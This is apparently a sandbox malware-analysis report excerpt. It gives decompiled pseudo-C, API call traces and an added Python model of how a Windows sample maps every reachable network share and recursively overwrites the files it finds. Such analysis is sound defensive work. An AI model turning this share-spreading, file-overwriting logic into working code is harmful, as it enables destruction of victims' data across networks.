      • Part of subcall function 00141441: CloseHandle.KERNEL32(00000000), ref: 00141559
      • Part of subcall function 00141441: GetProcessHeap.KERNEL32(00000008,?), ref: 0014158C
      • Part of subcall function 00141441: HeapFree.KERNEL32(00000000), ref: 0014158F
      • Part of subcall function 00141441: FindNextFileW.KERNEL32(?,00000010), ref: 001415A2
      • Part of subcall function 00141441: FindClose.KERNEL32(?), ref: 001415B6
    • WNetCancelConnection2W.MPR(-00000014,00000000,00000001), ref: 00141669
      • Part of subcall function 001415CB: GlobalFree.KERNEL32(00000000), ref: 001416A3
      • Part of subcall function 001415CB: WNetCloseEnum.MPR(?), ref: 001416AD
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 21%
    			E00143552(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t11;
    				intOrPtr* _t12;
    				intOrPtr _t13;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				void* _t19;
    				intOrPtr _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t26;
    				void* _t27;
    				void* _t33;
    				signed int _t36;
    				intOrPtr* _t37;
    				void* _t39;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    
    				_t40 = __imp__DecodePointer;
    				_t11 =  *_t40( *0x14a8a8, _t33, _t39, _t23, _t27); // executed
    				_t24 = _t11;
    				_v8 = _t24;
    				_t12 =  *_t40( *0x14a8a4); // executed
    				_t41 = _t12;
    				if(_t41 < _t24) {
    					L11:
    					_t13 = 0;
    				} else {
    					_t36 = _t41 - _t24;
    					_t2 = _t36 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L11;
    					} else {
    						_t26 = E00144E1A(_t24);
    						_t3 = _t36 + 4; // 0x4
    						if(_t26 >= _t3) {
    							L10:
    							_t37 = __imp__EncodePointer; // executed
    							_t17 =  *_t37(_a4); // executed
    							 *_t41 = _t17;
    							_t18 =  *_t37(_t41 + 4); // executed
    							 *0x14a8a4 = _t18;
    							_t13 = _a4;
    						} else {
    							_t19 = 0x800;
    							if(_t26 < 0x800) {
    								_t19 = _t26;
    							}
    							_t20 = _t19 + _t26;
    							if(_t19 + _t26 < _t26) {
    								L7:
    								_t5 = _t26 + 0x10; // 0x10
    								_t21 = _t5;
    								if(_t5 < _t26) {
    									goto L11;
    								} else {
    									_t22 = E001444F9(_v8, _t21);
    									if(_t22 == 0) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								}
    							} else {
    								_t22 = E001444F9(_v8, _t20);
    								if(_t22 != 0) {
    									L9:
    									_t41 = _t22 + (_t36 >> 2) * 4;
    									__imp__EncodePointer(_t22);
    									 *0x14a8a8 = _t22;
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    				return _t13;
    			}
    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 00143567
    • DecodePointer.KERNEL32(?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 00143574
      • Part of subcall function 00144E1A: HeapSize.KERNEL32(00000000,00000000,?,00143592,00000000,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?), ref: 00144E45
      • Part of subcall function 001444F9: Sleep.KERNEL32(00000000,00000000,00000000,?,001435CC,00000000,00000010,?,?,?,?,?,00143656,?,00147C90,0000000C), ref: 00144523
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435D9
    • EncodePointer.KERNEL32(?,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435ED
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435F5
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E001416BF(void* __eflags) {
    				void* _t7;
    
    				SetThreadPriority(GetCurrentThread(), 2);
    				SetThreadPriority(GetCurrentThread(), 0xf);
    				E001415CB(_t7, 0); // executed
    				return 0;
    			}
    APIs
    • GetCurrentThread.KERNEL32(00000002), ref: 001416C9
    • SetThreadPriority.KERNEL32(00000000), ref: 001416D2
    • GetCurrentThread.KERNEL32(0000000F), ref: 001416D6
    • SetThreadPriority.KERNEL32(00000000), ref: 001416D9
      • Part of subcall function 001415CB: WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 001415F2
      • Part of subcall function 001415CB: GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?,?,?,?,001416E2,00000000), ref: 00141606
      • Part of subcall function 001415CB: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 0014162F
      • Part of subcall function 001415CB: WNetAddConnection2W.MPR(-00000028,00000000,00000000,00000004), ref: 00141652
      • Part of subcall function 001415CB: WNetCancelConnection2W.MPR(-00000014,00000000,00000001), ref: 00141669
      • Part of subcall function 001415CB: GlobalFree.KERNEL32(00000000), ref: 001416A3
      • Part of subcall function 001415CB: WNetCloseEnum.MPR(?), ref: 001416AD
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
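E001415CB and its thread entry E001416BF read more easily as an explicit algorithm. The Python below is a reconstruction added as an example, not the sample's code: the WNet calls are modelled rather than invoked, the network tree is constructed, and the rule that a credential-less WNetAddConnection2W succeeds only for CONNECTABLE entries is an assumption. What it keeps from the decompiled code is the NETRESOURCEW layout the loop depends on (32-byte stride, dwUsage at +0x0C, lpRemoteName at +0x14), the CONNECT_TEMPORARY connection, the call into E00141441 while the share is mapped, the forced WNetCancelConnection2W afterwards, and recursion into every container entry starting from a NULL root, which is what E001416BF passes after raising itself to THREAD_PRIORITY_TIME_CRITICAL. One caveat from the decompiled loop that the model does not replicate: the do/while ends only when WNetEnumResourceW returns ERROR_NO_MORE_ITEMS (0x103); any other status re-enters the loop.

```python
"""Reconstruction of the network-share walk in E001415CB / E001416BF.
Added example: not the sample's code; the WNet calls are modelled, not invoked."""
import struct

# NETRESOURCEW on 32-bit Windows: dwScope, dwType, dwDisplayType, dwUsage,
# lpLocalName, lpRemoteName, lpComment, lpProvider (8 DWORDs, 32 bytes).
# The decompiled loop advances 32 bytes per record (_t53 = &_t53[8]), reads
# lpRemoteName at +0x14 and tests dwUsage at +0x0C against CONTAINER.
NETRESOURCE_FMT = "<IIIIIIII"
NETRESOURCE_SIZE = struct.calcsize(NETRESOURCE_FMT)
OFF_USAGE, OFF_REMOTE, OFF_PROVIDER = 0x0C, 0x14, 0x1C
RESOURCEUSAGE_CONNECTABLE = 0x1
RESOURCEUSAGE_CONTAINER = 0x2
CONNECT_TEMPORARY = 0x4          # WNetAddConnection2W dwFlags captured in the report
ERROR_NO_MORE_ITEMS = 0x103      # the only status that ends the do/while in E001415CB

def read_wstr(buf, off):
    """NUL-terminated UTF-16LE string at buf[off:]; offset 0 stands for a NULL pointer."""
    if off == 0:
        return None
    end = off
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le")

def parse_netresources(buf, count):
    """Decode `count` NETRESOURCEW records at the front of a WNetEnumResource buffer.
    String pointers are treated as offsets into the same buffer, which is how
    WNetEnumResource fills the caller's buffer (records first, strings behind them)."""
    out = []
    for i in range(count):
        base = i * NETRESOURCE_SIZE
        usage = struct.unpack_from("<I", buf, base + OFF_USAGE)[0]
        remote = struct.unpack_from("<I", buf, base + OFF_REMOTE)[0]
        provider = struct.unpack_from("<I", buf, base + OFF_PROVIDER)[0]
        out.append({"usage": usage, "remote": read_wstr(buf, remote),
                    "provider": read_wstr(buf, provider)})
    return out

def build_enum_buffer(entries):
    """Lay out constructed (remote, dwUsage, provider) tuples the way WNetEnumResource
    would: the record array first, then the strings the records point at."""
    strings = bytearray()
    recs = []
    string_base = len(entries) * NETRESOURCE_SIZE
    def put(s):
        if s is None:
            return 0
        off = string_base + len(strings)
        strings.extend(s.encode("utf-16-le") + b"\x00\x00")
        return off
    for remote, usage, provider in entries:
        r, p = put(remote), put(provider)
        # dwScope = 2 (RESOURCE_GLOBALNET), as in the WNetOpenEnumW call; other fields unused
        recs.append(struct.pack(NETRESOURCE_FMT, 2, 0, 0, usage, 0, r, 0, p))
    return b"".join(recs) + bytes(strings)

# Constructed network tree (an assumption for the demo): container -> children.
# None is the root E001416BF hands in (E001415CB(_t7, 0): lpNetResource == NULL).
NETWORK = {
    None: [("Microsoft Windows Network", RESOURCEUSAGE_CONTAINER, "Microsoft Windows Network")],
    "Microsoft Windows Network": [("WORKGROUP", RESOURCEUSAGE_CONTAINER, None)],
    "WORKGROUP": [("\\\\HOST-A", RESOURCEUSAGE_CONTAINER, None),
                  ("\\\\HOST-B", RESOURCEUSAGE_CONTAINER, None)],
    "\\\\HOST-A": [("\\\\HOST-A\\Share", RESOURCEUSAGE_CONNECTABLE, None),
                   ("\\\\HOST-A\\IPC$", 0, None)],
    "\\\\HOST-B": [("\\\\HOST-B\\Data", RESOURCEUSAGE_CONNECTABLE | RESOURCEUSAGE_CONTAINER, None)],
    "\\\\HOST-B\\Data": [],
}

def enum_resource(container, per_call=1):
    """Model WNetEnumResourceW: a few records per call, then ERROR_NO_MORE_ITEMS."""
    entries = NETWORK.get(container, [])
    for i in range(0, len(entries), per_call):
        chunk = entries[i:i + per_call]
        yield 0, build_enum_buffer(chunk), len(chunk)
    yield ERROR_NO_MORE_ITEMS, b"", 0

def walk(container, events):
    """Replay of E001415CB over one enumeration handle; returns the ordered actions."""
    for status, buf, count in enum_resource(container):
        if status == ERROR_NO_MORE_ITEMS:
            break
        for res in parse_netresources(buf, count):
            # WNetAddConnection2W(res, NULL, NULL, CONNECT_TEMPORARY): no credentials are
            # supplied, so only shares the current token can already reach get mapped.
            # Modelled as "succeeds iff the entry is CONNECTABLE" (assumption, not sandbox data).
            if res["usage"] & RESOURCEUSAGE_CONNECTABLE:
                events.append(("connect", res["remote"]))
                events.append(("process_files", res["remote"]))   # E00141441 runs here
                events.append(("cancel", res["remote"]))          # WNetCancelConnection2W(name, 0, TRUE)
            if res["usage"] & RESOURCEUSAGE_CONTAINER:            # (*(_t53 - 8) & 2) == 2
                walk(res["remote"], events)
    return events

if __name__ == "__main__":
    for action in walk(None, []):
        print(*action)
```

The order of the printed actions is the point: every reachable share is mapped, handed to E00141441 and unmapped before the walk descends into the next container, and containers are entered whether or not the connection to them succeeded.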

    Control-flow Graph

    C-Code - Quality: 23%
    			E00141B9B(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t4;
    				intOrPtr* _t10;
    				void* _t18;
    				intOrPtr* _t19;
    				void* _t21;
    
    				_t21 = __esi;
    				_t18 = __edi;
    				_t24 =  *0x14a8b0;
    				if( *0x14a8b0 != 0 && E00143740(_t24, 0x14a8b0) != 0) {
    					_t2 =  *0x14a8b0(_a4);
    				}
    				E0014368C(_t2);
    				_t4 = E00141B77(0x146190, 0x1461a4); // executed
    				_t26 = _t4;
    				if(_t4 == 0) {
    					_push(_t21);
    					_push(_t18);
    					E00143675(_t26, E001427C4); // executed
    					_t19 = 0x146188;
    					if(0x146188 >= 0x14618c) {
    						L8:
    						_t30 =  *0x14a8b4;
    						if( *0x14a8b4 != 0 && E00143740(_t30, 0x14a8b4) != 0) {
    							 *0x14a8b4(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t10 =  *_t19;
    						if(_t10 != 0) {
    							 *_t10();
    						}
    						_t19 = _t19 + 4;
    					} while (_t19 < 0x14618c);
    					goto L8;
    				}
    				return _t4;
    			}
    APIs
      • Part of subcall function 0014368C: EncodePointer.KERNEL32(2657F566,?,?,00141BC7), ref: 00143698
    • __initterm_e.LIBCMT ref: 00141BD1
      • Part of subcall function 00143740: __FindPESection.LIBCMT ref: 0014379B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 247 14523e-145248 248 145265-14526e 247->248 249 14524a-145254 247->249 250 145271-145276 248->250 251 145270 248->251 249->248 252 145256-145264 call 14353f 249->252 253 14528b-145292 250->253 254 145278-145289 RtlAllocateHeap 250->254 251->250 256 145294-14529d call 1434d5 253->256 257 1452b0-1452b5 253->257 254->253 259 1452bd-1452bf 254->259 256->250 263 14529f-1452a4 256->263 257->259 261 1452b7 257->261 261->259 264 1452ac-1452ae 263->264 265 1452a6 263->265 264->259 265->264
    C-Code - Quality: 86% (the report's per-line address column is appended to each line as a // @0x comment)
    E0014523E(signed int _a4, signed int _a8, long _a12) {
        void* _t10;
        long _t11;
        long _t12;
        signed int _t13;
        signed int _t17;
        long _t19;
        long _t24;

        _t17 = _a4; // @0x00145243
        if(_t17 == 0) { // @0x00145248
            L3: // @0x00145265
            _t24 = _t17 * _a8; // @0x0014526a
            __eflags = _t24; // @0x0014526c
            if(_t24 == 0) { // @0x0014526e
                _t24 = _t24 + 1; // @0x00145270
                __eflags = _t24; // @0x00145270
            } // @0x00145270
            goto L5;
            L6: // @0x00145278
            _t10 = RtlAllocateHeap( *0x14a5c8, 8, _t24); // executed @0x00145281
            __eflags = 0; // @0x00145287
            if(0 == 0) { // @0x00145289
                goto L7;
            }
            L14: // @0x001452bd
            return _t10; // @0x001452bf
            goto L15;
            L7: // @0x0014528b
            __eflags =  *0x14a780; // @0x0014528b
            if( *0x14a780 == 0) { // @0x00145292
                _t19 = _a12; // @0x001452b0
                __eflags = _t19; // @0x001452b3
                if(_t19 != 0) { // @0x001452b5
                     *_t19 = 0xc; // @0x001452b7
                } // @0x001452b7
            } else { // @0x00145294
                _t11 = E001434D5(_t10, _t24); // @0x00145295
                __eflags = _t11; // @0x0014529b
                if(_t11 != 0) { // @0x0014529d
                    L5: // @0x00145271
                    _t10 = 0; // @0x00145271
                    __eflags = _t24 - 0xffffffe0; // @0x00145273
                    if(_t24 > 0xffffffe0) { // @0x00145276
                        goto L7;
                    } else {
                        goto L6;
                    }
                } else { // @0x0014529f
                    _t12 = _a12; // @0x0014529f
                    __eflags = _t12; // @0x001452a2
                    if(_t12 != 0) { // @0x001452a4
                         *_t12 = 0xc; // @0x001452a6
                    } // @0x001452a6
                    _t10 = 0; // @0x001452ac
                } // @0x001452ac
            } // @0x0014529d
            goto L14;
        } else { // @0x0014524a
            _t13 = 0xffffffe0; // @0x0014524e
            _t27 = _t13 / _t17 - _a8; // @0x00145251
            if(_t13 / _t17 >= _a8) { // @0x00145254
                goto L3;
            } else { // @0x00145256
                 *((intOrPtr*)(E0014353F(_t27))) = 0xc; // @0x0014525b
                return 0; // @0x00145264
            } // @0x00145264
        } // @0x00145254
        L15:
    }

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214,?,00141E3B), ref: 00145281
      • Part of subcall function 001434D5: DecodePointer.KERNEL32(?,0014529A,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214), ref: 001434E0
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 266 143608-14362b call 1444ad EncodePointer 269 14362d-143631 266->269 270 143632-143638 266->270
    C-Code - Quality: 37% (the report's per-line address column is appended to each line as a // @0x comment)
    E00143608() {
        signed int* _t1;
        void* _t3;
        signed int* _t6;

        _t1 = E001444AD(0x20, 4); // @0x0014360f
        _t6 = _t1; // @0x00143616
        __imp__EncodePointer(_t6); // executed @0x00143619
         *0x14a8a8 = _t1; // @0x0014361f
         *0x14a8a4 = _t1; // @0x00143624
        if(_t6 != 0) { // @0x0014362b
             *_t6 =  *_t6 & 0x00000000; // @0x00143632
            return 0; // @0x00143638
        } else { // @0x0014362d
            _t3 = 0x18; // @0x0014362f
            return _t3; // @0x00143631
        } // @0x00143631
    }

    APIs
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • EncodePointer.KERNEL32(00000000), ref: 00143619
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 271 14368c-143690 272 143692-1436aa EncodePointer 271->272 272->272 273 1436ac-1436ae 272->273
    APIs
    • EncodePointer.KERNEL32(2657F566,?,?,00141BC7), ref: 00143698
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 142c5e-142c7b HeapCreate
    C-Code - Quality: 100% (the report's per-line address column is appended to each line as a // @0x comment)
    E00142C5E() {
        void* _t3;

        _t3 = HeapCreate(0, 0x1000, 0); // executed @0x00142c67
         *0x14a5c8 = _t3; // @0x00142c74
        return 0 | _t3 != 0x00000000; // @0x00142c7b
    }

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0014189B), ref: 00142C67
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 275 142f4b-142f5b EncodePointer
    APIs
    • EncodePointer.KERNEL32(Function_00002F12,00141B72,00000000,00000000,00000000,00000000,00000000,00000000,771CF9A3,00142BAE,?,001418AC), ref: 00142F50
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    APIs
    • EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100% (the report's per-line address column is appended to each line as a // @0x comment)
    E001444AD(signed int _a4, signed int _a8) {
        void* _t4;
        long _t6;
        void* _t7;
        long _t8;
        void* _t9;
        void* _t12;
        void* _t13;

        _t8 = 0; // @0x001444b4
        while(1) { // @0x001444b6
            _t4 = E0014523E(_a4, _a8, 0); // executed @0x001444be
            _t7 = _t4; // @0x001444c3
            _t9 = _t9 + 0xc; // @0x001444c5
            if(_t7 != 0) { // @0x001444ca
                break;
            }
            _t12 =  *0x14a774 - _t4; // 0x0 @0x001444cc
            if(_t12 > 0) { // @0x001444d2
                Sleep(_t8); // @0x001444d5
                _t3 = _t8 + 0x3e8; // 0x3e8 @0x001444db
                _t6 = _t3; // @0x001444db
                _t13 = _t6 -  *0x14a774; // 0x0 @0x001444e1
                if(_t13 > 0) { // @0x001444e7
                    _t6 = _t6 | 0xffffffff; // @0x001444e9
                } // @0x001444e9
                _t8 = _t6; // @0x001444ec
                if(_t6 != 0xffffffff) { // @0x001444f1
                    continue;
                }
            } // @0x001444f1
            break;
        } // @0x001444d2
        return _t7; // @0x001444f8
    }

    APIs
      • Part of subcall function 0014523E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214,?,00141E3B), ref: 00145281
    • Sleep.KERNEL32(00000000), ref: 001444D5
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Non-executed Functions

    C-Code - Quality: 61% (the report's per-line address column is appended to each line as a // @0x comment)
    E00141441(void* __edx, WCHAR* _a4) {
        signed int _v12;
        short _v1056;
        struct _WIN32_FIND_DATAW _v1648;
        WCHAR* _v1652;
        void* _v1656;
        WCHAR* _v1660;
        void* _v1668;
        char _v1672;
        void* __ebx;
        void* __edi;
        void* __esi;
        signed int _t30;
        WCHAR* _t32;
        int _t37;
        WCHAR* _t40;
        void* _t59;
        void* _t65;
        void* _t66;
        void* _t68;
        signed int _t69;

        _t65 = __edx; // @0x00141441
        _t30 =  *0x149004; // 0x20251455 @0x0014144a
        _v12 = _t30 ^ _t69; // @0x00141451
        _t32 = _a4; // @0x00141454
        _v1660 = _t32; // @0x0014145b
        wsprintfW( &_v1056, L"%s\\*", _t32); // @0x0014146d
        _t37 = FindFirstFileW( &_v1056,  &_v1648); // @0x00141484
        _v1656 = _t37; // @0x0014148a
        if(_t37 != 0xffffffff) { // @0x00141493
            _t68 = GetProcessHeap; // @0x00141499
            _t59 = PathAppendW; // @0x0014149f
            do { // @0x001414a5
                _t40 = HeapAlloc(GetProcessHeap(), 8, 0x410); // @0x001414af
                _v1652 = _t40; // @0x001414bb
                PathAppendW(_t40, _v1660); // @0x001414c2
                PathAppendW(_v1652,  &(_v1648.cFileName)); // @0x001414d1
                if((_v1648.dwFileAttributes & 0x00000010) == 0) { // @0x001414da
                    _v1672 = 0; // @0x00141530
                    asm("stosd"); // @0x0014153c
                    _t66 = CreateFileW(_v1652, 0x40000000, 0, 0, 3, 0x80, 0); // @0x00141543
                    if(_t66 != 0xffffffff) { // @0x00141548
                        __imp__GetFileSizeEx(_t66,  &_v1672); // @0x00141552
                        CloseHandle(_t66); // @0x00141559
                        if(_v1672 <= 0xf4240) { // @0x00141569
                            E0014117C(_v1652, _t65); // @0x0014157f
                        } else { // @0x0014156b
                            E001410F5(_t59, _t65, _v1652); // @0x00141571
                            goto L9;
                        } // @0x00141571
                    } // @0x00141569
                } else { // @0x001414dc
                    _t66 = __imp__#156; // @0x001414dc
                    _push("."); // @0x001414e2
                    _push( &(_v1648.cFileName)); // @0x001414ed
                    if( *_t66() != 0) { // @0x001414f2
                        _push(L".."); // @0x001414f8
                        _push( &(_v1648.cFileName)); // @0x00141503
                        if( *_t66() != 0) { // @0x00141508
                            E00141441(_t65, _v1652); // @0x00141510
                            L9: // @0x00141576
                        } // @0x00141576
                    } // @0x00141508
                } // @0x001414f2
                HeapFree(GetProcessHeap(), 8, _v1652); // @0x0014158f
            } while (FindNextFileW(_v1656,  &_v1648) != 0); // @0x001415a8
            _t37 = FindClose(_v1656); // @0x001415b6
        } // @0x001415b6
        return E001417EA(_t37, _t59, _v12 ^ _t69, _t65, _t66, _t68); // @0x001415ca
    }

    APIs
    • wsprintfW.USER32 ref: 0014146D
    • FindFirstFileW.KERNEL32(?,?), ref: 00141484
    • GetProcessHeap.KERNEL32(00000008,00000410), ref: 001414AC
    • HeapAlloc.KERNEL32(00000000), ref: 001414AF
    • PathAppendW.SHLWAPI(00000000,?), ref: 001414C2
    • PathAppendW.SHLWAPI(?,?), ref: 001414D1
    • StrCmpCW.SHLWAPI(?,00147918), ref: 001414EE
    • StrCmpCW.SHLWAPI(?,0014791C), ref: 00141504
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0014153D
    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00141552
    • CloseHandle.KERNEL32(00000000), ref: 00141559
      • Part of subcall function 0014117C: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 001411E0
      • Part of subcall function 0014117C: GetLastError.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 001411ED
      • Part of subcall function 0014117C: SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000002,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141204
      • Part of subcall function 0014117C: WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 00141218
      • Part of subcall function 0014117C: FlushFileBuffers.KERNEL32(00000000), ref: 00141223
      • Part of subcall function 0014117C: GetFileSizeEx.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141231
      • Part of subcall function 0014117C: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 0014123B
      • Part of subcall function 0014117C: WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0014128B
      • Part of subcall function 0014117C: FlushFileBuffers.KERNEL32(00000000), ref: 001412CA
      • Part of subcall function 0014117C: CloseHandle.KERNEL32(00000000), ref: 001412D1
      • Part of subcall function 001410F5: CreateFileW.KERNEL32(00141576,40000000,00000000,00000000,00000003,00000080,00000000), ref: 00141129
      • Part of subcall function 001410F5: SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000000,?,00141576,?), ref: 0014113B
      • Part of subcall function 001410F5: WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 00141156
      • Part of subcall function 001410F5: FlushFileBuffers.KERNEL32(00000000), ref: 00141161
      • Part of subcall function 001410F5: CloseHandle.KERNEL32(00000000), ref: 00141168
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0014158C
    • HeapFree.KERNEL32(00000000), ref: 0014158F
    • FindNextFileW.KERNEL32(?,00000010), ref: 001415A2
    • FindClose.KERNEL32(?), ref: 001415B6
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
